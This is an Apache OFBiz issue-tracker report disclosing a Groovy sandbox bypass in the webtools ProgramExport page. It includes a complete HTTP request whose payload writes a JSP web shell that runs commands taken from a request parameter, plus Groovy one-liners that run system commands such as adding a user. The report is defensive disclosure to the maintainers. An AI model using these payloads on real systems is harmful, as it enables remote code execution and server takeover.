Uploaded image for project: 'OFBiz'
  1. OFBiz
  2. OFBIZ-12305

Groovy Program sandbox bypass

    XMLWordPrintableJSON

Details

    • Important

    Description

      Code location
      https://github.com/apache/ofbiz-framework/blob/trunk/framework/webtools/groovyScripts/entity/ProgramExport.groovy#L89-L92

      The judgment of Groovy code here can easily bypass this restriction.

      a)
      The http packet is as follows:

      POST /webtools/control/ProgramExport HTTP/1.1
      Host: 127.0.0.1:8443
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:91.0) Gecko/20100101 Firefox/91.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      Accept-Encoding: gzip, deflate
      Referer: https://127.0.0.1:8443/webtools/control/ProgramExport
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 925
      Origin: https://127.0.0.1:8443
      Connection: close
      Cookie: JSESSIONID=BC833071F17F30BE022A7D44A5BB78C5.jvm1; OFBiz.Visitor=10103; CookiePreferences=[]; login_username=admin; login_nickname=admin; UM_distinctid=178a633ad075a3-0853063891be59-445b6f-13c680-178a633ad087e9; displayTagDiv=false; Hm_lvt_e325e60ca4cd358f2b424f5aecb8021a=1621261771; careyshop-1.8.4-uuid=admin; careyshop-1.8.4-block=false
      Upgrade-Insecure-Requests: 1
      Sec-Fetch-Dest: document
      Sec-Fetch-Mode: navigate
      Sec-Fetch-Site: same-origin
      Sec-Fetch-User: ?1

      groovyProgram=// Use the List variable recordValues to fill it with GenericValue maps.
      // full groovy syntaxt is available

      import org.apache.ofbiz.entity.util.EntityFindOptions

      def x = "jsp"
      def f = "%"
      def x2 = "<% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"i\")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print(\"<pre>\");while((a=in.read(b))!=-1){out.println(new String(b));}out.print(\"</pre>\");%>"

      def w_file = new File("/Users/master/Downloads/ofbiz-framework-release17.12.08/themes/common/webapp/images/123."+x)
      w_file.withWriter

      { writer -> writer.append(x2) }

      &submitButton=运行*

      In this way, the jsp Trojan is uploaded.

      b)
      Use groovy to execute system commands to bypass restrictions.

      def process = "touch /tmp/xxx".execute()
      def process2 = "useradd vvv".execute()

      There are very mature solutions on the groovy sandbox on the market. You can refer to it.

      Attachments

        Activity

          People

            jleroux Jacques Le Roux
            thiscodecc thiscodecc
            Votes:
            0 Vote for this issue
            Watchers:
            2 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved: